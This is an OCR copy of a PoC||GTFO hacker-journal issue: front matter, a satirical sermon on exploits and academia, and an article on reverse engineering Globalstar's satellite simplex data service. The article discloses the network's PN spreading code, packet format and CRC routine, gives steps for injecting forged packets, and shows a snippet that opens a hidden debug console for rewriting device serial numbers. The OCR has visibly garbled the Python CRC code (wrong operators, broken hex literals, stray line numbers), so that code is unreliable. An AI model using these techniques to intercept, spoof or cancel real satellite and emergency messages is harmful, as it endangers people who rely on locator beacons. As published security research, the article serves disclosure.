GTFO
PoC
PASTOR MANUL LAPHROAIG’S
TABERNACLE CHOIR
SINGS REVERENT ELEGIES
OF THE
SECOND CRYPTO WAR
September 14, 2015
9:2 A Sermon on Newton and Turing
9:3 Globalstar Satellite Communications
9:4 Keenly Spraying the Kernel Pools
9:5 The Second Underhanded Crypto Contest
9:6 Cross VM Communications
9:7 Antivirus Tumors
9:8 A Recipe for TCP/IPA
9:9 Mischief with AX. 25 and APRS
9:10 Napravi i ti Racunar „Galaksija“
9:11 Root Rights are a Grrl’s Best Friend!
9:12 What If You Could Listen to This PDF?
9:13 Oona’s Puzzle Corner!
Novi Sad, Serbia and Stockholm, Sweden:
Funded by Single Malt as Midnight Oil and the
Tract Association of PoC || GTFO and Friends,
to be Freely Distributed to all Good Readers, and
to be Freely Copied by all Good Bookleggers.
Oto caMHS^aT. Quand un livre a ete ecrit et bien ecrit, n’ayez aucun scrupule, prenez-le, copiezU
€0, $0 USD, £0, 0 RSD, 0 SEK, $50 CAD. pocorgtfo09.pdf.
1
Legal Note: To all interested parties except Adobe Systems, unlimited license is granted to read, duplicate,
share, reprint, and learn from this document. Adobe Systems may not read or learn from this document
unless they agree in writing to (1) forgive the editors for pirating Adobe Photoshop 4.0 for Macintosh and
(2) stop blacklisting our lovely little polyglot files! (An apology to Dmitry Sklyarov would also be nice.)
Reprints: Bitrot will burn libraries with merciless indignity that even Pets Dot Com didn’t deserve. Please
mirror-don’t merely linkl-pocorgtfo09.pdf and our other issues far and wide, so our articles can help fight
the coming robot apocalypse.
Technical Note: You’ll be happy to find that pocorgtfo09.pdf is a polyglot that is valid in three file
formats. You may interpret it as a PDF to read this issue, as a ZIP to read this issue’s source code
releases, or as a WavPack lossless audio file to listen to fbz’ classic from page 60. You may have to change
the file extension to .wv, depending on your audio player. A list of compatible players is available at
http : //www. wavpack. com/#Sof tware.
Printing Instructions: Pirate print runs of this journal are most welcome! PoC||GTFO is to be printed
duplex, then folded and stapled in the center. Print on A3 paper in Europe and Tabloid (11” x 17”) paper
in Samland. Secret government labs in Canada may use P3 (280 mm x 430 mm) if they like. The outermost
sheet should be on thicker paper to form a cover.
# This is how to convert an issue for duplex printing.
sudo apt-get install pdf jam
pdf book --short-edge --vanilla --paper a3paper pocorgtfo09.pdf -o pocorgtfo09-book.pdf
Preacherman
Ethics Advisor
Poet Laureate
Editor of Last Resort
Carpenter of the Samizdat Hymnary
Editorial Whipping Boy
Funky File Formats Polyglot
Assistant Scenic Designer
Minister of Spargelzeit Weights and Measures
Manul Laphroaig
The Grugq
Ben Nagy
Melilot
Redbeard
Jacob Torrey
Ange Albertini
Philippe Teuwen
FX
2
1 Please stand; now, please be seated.
Neighbors, please join me in reading this tenth
release of the International Journal of Proof of Con-
cept or Get the Fuck Out, a friendly little collection
of articles for ladies and gentlemen of distinguished
ability and taste in the field of software exploitation
and the worship of weird machines. This is our tenth
release, given on paper to the fine neighbors of Novi
Sad, Serbia and Stockholm, Sweden.
If you are missing the first nine issues, we the
editors suggest pirating them from the usual loca-
tions, or on paper from a neighbor who picked up a
copy of the first in Vegas, the second in Sao Paulo,
the third in Hamburg, the fourth in Heidelberg, the
fifth in Montreal, the sixth in Las Vegas, the seventh
from his parents’ inkjet printer during the Thanks-
giving holiday, the eighth in Heidelberg, or the ninth
in Montreal.
Page 4 contains our very own Pastor Manul
Laphroaig’s sermon on Newton and Turing, in which
we learn about the academics’ affection for Turing-
completeness and why they should be allowed to
marry it.
On page 7, Colby Moore provides all the details
you’ll need to sniff simplex packets from the Glob-
alstar satellite constellation.
Page 12 introduces some tips by Peter Hlavaty of
the Keen Team on kernel pool spraying in Windows
and Linux.
Page 19 presents the results of the second Under-
handed Crypto Contest, held at the Crypto Village
of Defcon 23.
On page 21, Sophia D ’Antoine introduces some
tricks for communicating between virtual machines
co- located on the same physical host. In particular,
the mf ence instruction can be used to force strict or-
dering, interfering with CPU instruction pipelining
in another VM.
Eric Davisson, on page 26, presents a nifty lit-
tle trick for causing quarantined malware to be re-
detected by McAfee Enterprise VirusScan! This par-
ticular tumor is benign, but we bet a neighborly
reader can write a malignant variant.
Ron Fabela of Binary Brew Works, on page 28,
presents his recipe for TCP/IPA, a neighborly beer
with which to warm our hearts and our spirits dur-
ing the coming apocalypse.
Our centerfold in this issue is the schematic dia-
gram to an Electronika BK 0010-01 computer from
the USSR. You wouldn’t believe how difficult it is
to google the proper way to render a centerfold in
DTeX!
Vogelfrei shares with us some tricks for APRS
and AX. 25 networking on page 34. APRS exists
around much of the western world, and all sorts of
mischief can be had through it. (But please don’t
be a jerk.)
Much as some readers think of us as a secu-
rity magazine, we are first and foremost a systems-
internals journal with a bias toward the strange and
the classic designs. Page 40 contains a reprint, in
the original Serbian, of Voja Antonie’ article on the
Galaksija, his Z80 home computer design, the very
first in Yugoslavia.
fbz is a damned fine neighbor of ours, both a
mathematician and a musician. On page 60 you’ll
find her latest single, Root Rights are a GrrVs Best
Friend! If you’d rather listen to it than just read
the lyrics, run vie pocorgtfo09.pdf and jump to
page 61, where Philippe Teuwen describes how he
made this fine document a polyglot of PDF, ZIP,
and WavPack.
On page 62, you will find Oona’s Puzzle Corner,
with all sorts of nifty games for a child of five. If
you aren’t clever enough to solve them, then ask for
help from a child of five!
On page 64, the last and most important
page, we pass around the collection plate. Pastor
Laphroaig doesn’t need a touring jumbo jet like
those television and radio preachers; rather, this
humble worshiper of the weird machines needs a
Turing jumbo jet with which to storm Heaven!
3
1 Academics should just marry Turing Completeness already !”
—the grugq
2 From Newton to Turing, a Happy Family
by Pastor Manul Laphroaig D.D.
When engineers first gifted humanity with horse-
less carriages that moved on rails under their own
power, this invention, for all its usefulness, turned
out to have a big problem: occasional humans and
animals on the rails. This problem motivated many
inventors to look for solutions that would be both
usable and effective.
Unfortunately, none worked. The reason for
this is not so easy to explain— at least Aristotelian
physics had no explanation, and few scientists till
Galileo’s time were interested in one. On the one
hand, motion had to brought on by some force and
tended to kinda barrel about once it got going; on
the other hand, it also tended to dissipate eventu-
ally. It took about 500 years from doubting the
Aristotelian idea that motion ceased as soon as its
impelling force ceased to the first clear pronounce-
ment that motion in absence of external forces was
a persistent rather than a temporary virtue; and an-
other 600 for the first correct formulation of exactly
what quantities of motion were conserved. Even so,
it took another century before the mechanical con-
servation laws and the actual names and formulas
for momentum and energy were written down as we
know them.
These days, “conservation of energy” is supposed
to be one of those word combinations to check off
on multiple-choice tests that make one eligible for
college. 1 Yet we should remember that the steam
engine was invented well before these laws of clas-
sical mechanics were made comprehensible or even
understood at all. Moreover, it took some further
40-90 years after Watt’s ten- horsepower steam en-
gine patent to formulate the principles of thermody-
namics that actually make a steam engine work— by
which time it was chugging along at 10,000 horse-
power, able to move not just massive amounts of
machinery but even the engine’s own weight along
the rails, plus a lot more. 2
All of this is to say that if you hear scientists
doubting how an engineer can accomplish things
without their collective guidance, they have a lot
of history to catch up with, starting with that thing
called the Industrial Revolution. On the other hand,
if you see engineers trying to build a thing that just
doesn’t seem to work, you just might be able to point
them to some formulas that suggest their energies
are best applied elsewhere. Distinguishing between
these two situations is known as magic, wisdom, ex-
treme luck, or divine revelation; whoever claims to
be able to do so unerringly is at best a priest, 3 not
a scientist.
1 Whether one actually understands them or not — and, if you value your sanity, do not try to find if your physics teachers
actually understand them either. You have been warned.
2 Not that stationary steam engines were weaklings either: driving ironworks and mining pumps takes a lot of horses.
3 Typically, of a religion that involves central planning and state-run science. This time they’ll get it right, never fear!
4
There is an old joke that whatever activity needs
to add “science” to its name is not too sure it is one.
Some computer scientists may not take too kindly
to this joke, and point out that it’s actually the
word “computer” that’s misleading, as their science
transcends particular silicon- and-copper designs. It
is undeniable, though, that hacking as we know it
would not exist without actual physical computers.
As scientists, we like exhaustive arguments: ei-
ther by full search of all finite combinatorial pos-
sibilities or by tricks such as induction that look
convincing enough as a means of exhausting infinite
combinations. We value above all being able to say
that a condition never takes place, or always holds.
We dislike the possibility that there can be a situa-
tion or a solution we can overlook but someone may
find through luck or cleverness; we want a yes to
be a yes and a no to mean no way in Hell. But ei-
ther full search or induction only apply in the world
of ideal models— call them combinatorial, logical, or
mathematical— that exclude any kinds of unknown
unknowns.
Hence we have many models of computation:
substituting strings into other strings (Markov algo-
rithms), rewriting formulas (lambda calculus), au-
tomata with finite and infinite numbers of states,
and so on. The point is always to enumerate all fi-
nite possibilities or to convince ourselves that even
an infinite number of them does not harbor the ones
we wish to avoid. The idea is roughly the same as
using algebra: we use formulas we trust to reason
about any and all possible values at once, but to do
so we must reduce reality to a set of formulas. These
formulas come from a process that must prod and
probe reality; we have no way of coming up with
them without prodding, probing, and otherwise ex-
perimenting by hunch and blind groping— that is, by
building things before we fully understand how they
work. Without these, there can be no formulas, or
they won’t be meaningful.
So here we go. Exploits establish the variable
space; “science” searches it, to our satisfaction or
otherwise, or— importantly to save us effort— asserts
that a full and exhaustive search is infeasible. This
may be the case of energy conservation vs. trying
to construct a safer fender— or, perhaps, the case
of us still trying to formulate what makes sense to
attempt.
That which we call the “arms race” is a part of
this process. With it, we continually update the
variable spaces that we wish to exhaust; without it,
none of our methods and formulas mean much. This
brings us to the recent argument about exploits and
Turing completeness.
Knowledge is power . 4 In case of the steam en-
gine, the power emerged before the kind of knowl-
edge called “scientific” (if one is in college) or “basic”
(if one is a politician looking to hitch a ride— because
actual science has a tradition of overturning its own
“basics” as taught in schools for at least decades if
not centuries). In any case, the knowledge of how
to build these engines was there before the knowl-
edge that actually explained how they worked, and
would hardly have emerged if these things had not
been built already.
4 The question of whether that which is not power is still knowledge is best left to philosophers. One can blame Nasir al-Din
al-Tusi for explaining the value of Astrology to Khan Hulagu by dumping a cauldron down the side of a mountain to wake up
the Khan’s troops and then explaining that those who knew the causes above remained calm while those who didn’t whirled in
confusion below — but one can hardly deny that being able to convince a Khan was, in fact, power. Not to mention his horde.
Because a Khan, by definition, has a very convincing comeback for “Yeah? You and what horde?”
5
Our very own situation, neighbors, is not unlike
that of the steam power before the laws of ther-
modynamics. There are things that work (pump
mines, drive factories), and there are official ways of
explaining them that don’t quite work. Eventually,
they will merge, and the explanations will catch up,
and will then become useful for making things that
work better— but they haven’t quite yet, and it is
frustrating.
exploit programming, they not just focused on
the least practically relevant aspect of it (Tur-
ing completeness)— but did so to the exclusion of
all other kinds of niftyness such as information
leaks, probabilistic programming (heap feng-shui
and spraying), parallelism (cloning and pinning of
threads to sap randomization), and so on. That
focus on the irrelevant to the detriment of the rele-
vant had really rankled. It was hard to miss where
the next frontier of exploitation’s hard programming
tasks and its next set of challenges lay, but oh boy,
did the academia do it again.
Yet it is also clear why they did it. Academic
CS operates by models and exhaustive searches or
reasoning. Its primary method and deliverable is
exhaustive analysis of models, i.e., the promise that
certain bad things never happen, that all possible
trajectories of a system have been or can be enu-
merated.
Academia first saw exploit programming when
it was presented to it in the form of a model; prior
to that, their eyes would just slide off it, because it
looked “ad-hoc”, and one can neither reason about
“ad-hoc” nor enumerate it (at least, if one wants
to meet publication goals). When it turned out it
had a model, academia did with it what it normally
does with models: automating, tweaking, searching,
finding their theoretical limits, and relating them to
other models, one paper at a time . 5
This is not a bad method; at least, it gave us
complex compilers and CPUs that don’t crumble
under the weight of their bugs . 6 Eventually we will
want the kind of assurances this method creates—
when their models of unexpected execution are com-
plete enough and close enough to reality. For now,
they are not, and we have to go on building our en-
gines without guidance from models, but rather to
make sure new models will come from them.
Not that we are without hope. One only has
to look to Grsecurity/PaX at any given time to
see what will eventually become the precise stuff of
Newton’s laws for the better OS kernels; similarly,
the inescapable failure modes of data and program-
ming complexity will eventually be understood as
clearly as the three principles of thermodynamics.
Until then our best bet is to build engines— however
unscientific— and to construct theories— however re-
moved from real power— and to hope that the en-
gineering and the science will take enough notice of
each other to converge within a lifetime, as they have
had the sense to do during the so-called Industrial
Revolution, and a few lucky times since.
And to this, neighbors, the Pastor raises not one
but two drinks— one for the engineering orienting the
science, and one for the science catching up with the
knowledge that is power, and saving it the effort of
what cannot be done— and may they ever converge!
Amen.
5 And some of these papers were true Phrack-like gems that, true to the old-timey tradition, explained and exposed surprising
depths of common mechanisms: see, for example, SROP and COOP.
6 While, for example, products of the modern web development “revolution” already do, despite being much less complex
than a CPU.
6
3 Breaking Globalstar Satellite Communications
by Colby Moore
It might be an understatement to say that hackers have a fascination with satellites. Fortunately, with
advancements in Software Defined Radio such as the Ettus Research USRP and Michael Ossmann’s HackRF,
satellite hacking is now not only feasible, but affordable. Here we’ll discuss the reverse engineering of
Globalstar’s Simplex Data Service, allowing for interception of communications and injection of data back
into the network.
Rumor has it, that after deployment, Globalstar’s first generation of satellites began to fail, possibly due
to poor radiation hardening. This affected the return path data link, where Globalstar would transmit to a
user. To salvage the damaged satellite network, Globalstar introduced a line of simplex products that enable
short, one-way communication from the user to Globalstar.
The nature of the service makes it ideal for asset tracking and remote sensor monitoring. While extremely
popular with oil and gas, military, and shipping industries, this technology is also widely used by consumers.
A company called SPOT produces consumer- grade asset trackers and personal locator beacons that utilize
this same technology.
Globalstar touts their simplex service as “extremely difficult” to intercept, noting that the signal’s “Low-
Probability-of-Intercept (LPI) and Low- Probability-of-Detection(LPD) provide over-the-air security.” 7
In this article I’ll outline the basics for reverse engineering the Globalstar Simplex Data Services mod-
ulation scheme and protocol, and will provide the technical information necessary to interface with the
network.
3.1 Network Architecture
The network is comprised of many Low Earth Orbit, bent-pipe satellites. Data is transmitted from the user
to the satellite on an uplink frequency and repeated back to Earth on a downlink frequency. Globalstar
ground stations all over the world listen for this downlink data, interpret it, and expose it to the user via an
Internet-facing back-end. Each ground station provides a several thousand mile window of data coverage.
Bent-pipe satellites are “dumb” in that they do not modify the transmitted data. This means that the
data on the uplink is the same on the downlink. Thus, with the right knowledge, a skilled adversary can
intercept data on either link.
3.2 Tools and Code
This research was conducted using GNURadio and Python for data processing and an Ettus Research B200
for RF work. Custom proof-of-concept toolsets were written for DSSS and packet decoding. Devices tested
include a SPOT Generation 3, a SPOT Trace, and a SmartOne A.
3.3 Frequencies and Antennas
Four frequencies are allocated for the simplex data uplink. Current testing has only shown operation on
channel A.
Channel
Frequency
A
1611.25 MHz
B
1613.75 MHz
C
1616.25 MHz
D
1618.78 MHz
7 http : //productsupport . globalstar . com/2009/02/09/are-simplex-messages-secure/
7
Globalstar uses left-hand circular-polarized antennas for transmission of simplex data from the user to
the satellite. The Globalstar GSP-1620 antenna, designed for transmitting from the user to a satellite, has
proven adequate for experimentation.
Downlink is a bit more complicated, and far more faint. Channels vary by satellite, but are within the
6875-7055 MHz range. Both RHCP and LHCP are used for downlink.
3.4 Direct Sequence Spread Spectrum
Devices using the simplex data service implement direct sequence spread spectrum (DSSS) modulation to
reliably transmit data using low power. DSSS is a modulation scheme that works by mixing a slow data signal
with a very fast Pseudo Noise (PN) sequence. Since the pseudo-random sequence is known, the resulting
signal retains all of the original data information but spread over a much wider spectrum. Among other
benefits, this process makes the signal more tolerant to interference.
In Globalstar’s implementation of DSSS, packet data is first modulated as non-differential BPSK at
100.04 bits/second, then spread using a repeating 255 chip PN sequence at a rate of 1,250,000 chips/second.
Here “chip” refers to one bit of a PN sequence, so that it is not confused with actual data bits.
3.5 Pseudo Noise Sequence / M-Sequences
Pseudo Noise (PN) sequences are periodic binary sequences known by both the transmitter and receiver.
Without this sequence, data cannot be received. The simplex data service uses a specific type of PN sequence
called an M-Sequence.
M-Sequences have the unique property of having a strong autocorrelation for phase shifts of zero but
very poor correlation for any other phase shift. This makes the detection of the PN in unknown data, and
subsequently locking on to a DSSS signal, relatively simple.
All simplex data network devices examined use the same PN sequence to transmit data. By knowing one
code, all network data can be intercepted.
3.6 Obtaining The M-Sequence
In order to intercept network data, the PN sequence must be recovered. For each bit of data transmitted,
the PN sequence repeats 49 times. Data packets contain 144 bits.
8
1,250,000 chips 1 second
x
1 second 100.04 bits
1 PN sequence
x
255 chips
49 PN sequences / bit
The PN sequence never crosses a bit boundary, so it can be inferred that
xor (PN, data) = PN
By decoding the transmitted data stream as BPSK, 8 we can demodulate a spread bitstream. Note that
demodulation in this manner negates any processing gain provided from DSSS and thus can only be received
over short distances, so for long distances you will need to use a proper DSSS implementation.
Viewing the demodulated bitstream, a repeating sequence is observed. This is the PN, the spreading
code key to the kingdom.
The simplex data network PN code is 1111111100101101011011101010101110010011011010011001101-
00011101101100010001001111010010010000111100010100111000111110101111001110100001010110010-
10001011000001100100011000011011111101110000100000100101010010111110000001110011000110101-
0000000101110111101100.
3.7 Despreading
DSSS theory states that to decode a DSSS-modulated signal, a received signal must be mixed once again
with the modulating PN sequence; the original data signal will then fall out. However, for this to work, the
PN sequence needs to be phase-aligned with the mixed PN/data signal, otherwise only noise will emerge.
Alignment of the PN sequence to the data stream if accomplished by correlating the PN sequence against
the incoming datastream at each sample. When aligned, the correlation will peak. To despread, this
correlation peak is tracked and the PN is mixed with the sampled RF data. The resulting signal is the
100.04 bit/second non-differential BPSK modulated packet data.
3.8 Decoding and Locations
Once the signal is despread, a BPSK demodulator is used to recover data. The result is a binary stream,
144 bytes in length, representing one data packet. The data packet format is as follows:
Field
Bits
Description
Preamble
(10)
0000001011 signifies start of packet
ESN
(26)
3 bits for manufacturer ID and 23 bits for unit ID
Message #
(4)
message number modulo 16, saved in non-volatile memory
Packet #
(4)
number of packets in a message
Packet Seq. #
(4)
sequence number for each packet in a message
User Data
(72)
9 bytes of user information, MSB first
CRC24
(24)
CRC is 24 bits with polynomial: 114377431
Simplex data packets can technically transmit any 72 bits of user defined data. However, the network is
predominantly used for asset tracking and thus many packets contain GPS coordinates being relayed from
tracking devices. This data scheme for GPS coordinates can be interpreted with the following Python code.
latitude = i n t ( user _data [ 8 : 3 2 ] , 2 ) * 90 / 2**23
longitude = 360 — in t ( user _data [ 3 2 : 5 6 ] ,2) * 180 / 2**23
8 DSSS theory shows us that DSSS is the same as BPSK for a BPSK data signal.
9
3.9 CRC
Packets are verified using a 24 bit CRC. The data packet minus the preamble and CRC are fed into the CRC
algorithm in order to verify or generate a CRC. The following Python code implements the CRC algorithm.
2
4
6
10
12
14
16
18
20
22
24
26
28
30
32
34
36
38
40
42
44
46
def crcTwentyfour (TX_Data) :
k = 0
m = 0
TempCRC = 0
Crc = OxFFFFFF
for k in range (0,14): #calc checksum on 14 bytes starting with ESN
#offset to skip part of the preamble (dictated by algorithm)
TempCRC = int (TX_Data[ (k*8)+8 : (k*8)+8+8 ] , 2)
if 0 = k:
#skip 2 preamble bits in byteO
TempCRC = TempCRC & 0x3f
Crc = Crc ~ (TempCRC) <<16
for m in range (0,8) :
Crc = Crc « 1
if Crc & 0x1000000:
#seed CRC
Crc = Crc ~ 0114377431L
Crc = ( Crc) & Oxffffff ;
#end crc generation, lowest 24 bits of the long hold the CRC
ff first CRC byte to TX_Data
bytel4 = (Crc Sz OxOOffOOOO) » 16
#second CRC byte to TX_Data
bytel5 = (Crc & OxOOOOffOO) » 8
#third CRC byte to TX_Data
bytel6 = (Crc & OxOOOOOOff)
final_crc = (bytel4 « 16) | (bytel5 « 8) | bytel6
if final _ crc != int (TX_Data[ 1 20 : 1 44] , 2):
print "Error: CRC failed"
sys . exit (0)
3.10 Transmitting
DISCLAIMER: It is most likely illegal to transmit on Globalstar’s frequencies where you live. Do so at your
own risk. Remember, no one likes late night visits from the FCC and it would really suck if you interrupted
someone’s emergency communication!
By knowing the secret PN code, modulation parameters, data format, and CRC, it is possible to craft
custom data packets and inject them back into the satellite network. The process is as follows:
• Generate a custom packet
10
• Calculate and affix the packet’s CRC
• Spread the packet using the Globalstar PN sequence
• BPSK modulate the spread data and transmit on the RF carrier
Various SDR boards should have enough power to communicate with the network, however COTS am-
plifiers are available for less than a few hundred dollars. Specifications suggests a transmit power of about
200 milliwatts.
3.11 Spoofing
SPOT produces a series of asset trackers called SPOT Trace. SPOT also provides SPOT_Device_Updater .pkg,
an OS X update utility, to configure various device settings. This utility contains development code that is
never called by the consumer application.
The updater app package contains SP0T3FirmwareTool . jar. Decompilation shows that a UI view calls
a method writeESNO in SPOTDevice . class. You read that correctly, they included the functionality to
program arbitrary serial numbers to SPOT devices!
This UI can be called with a simple Java utility.
import com . globalstar . SPOT3FirmwareTool . UI . Debug Console ;
2
public class SpotDebugConsole {
4 public static void main ( St ring [ ] args) {
DebugConsole . main ( args ) ;
6 }
}
Upon execution, a debug console is launched, allowing the writing of arbitrary settings including ESNs, to
the SPOT device. (This functionality was included in Spot Device Updater 1.4 but has since been removed.)
3.12 Impact
The simplex data network is implemented in countless places worldwide. Everything from SCADA monitor-
ing to emergency communications relies on this network. To find that there is no encryption or authentication
on the services examined is sad. And to see that injection back into the network is possible is even worse.
Using the specifications outlined here, it is possible— among other things— to intercept communications
and track assets over time, spoof an asset’s location, or even cancel emergency help messages from personal
locator beacons.
One could also enhance their own service, create their own simplex data network device, or use the
network to transmit their own covert communications.
3.13 PoC and Resources
This work was presented at BlackHat USA 2015 and proof-of-concept code is available both by Github and
within this PDF file. 9
9 git clone https://github.com/synack/globalstar
unzip pocorgtfo09.pdf globalstar . tar . bz2
11
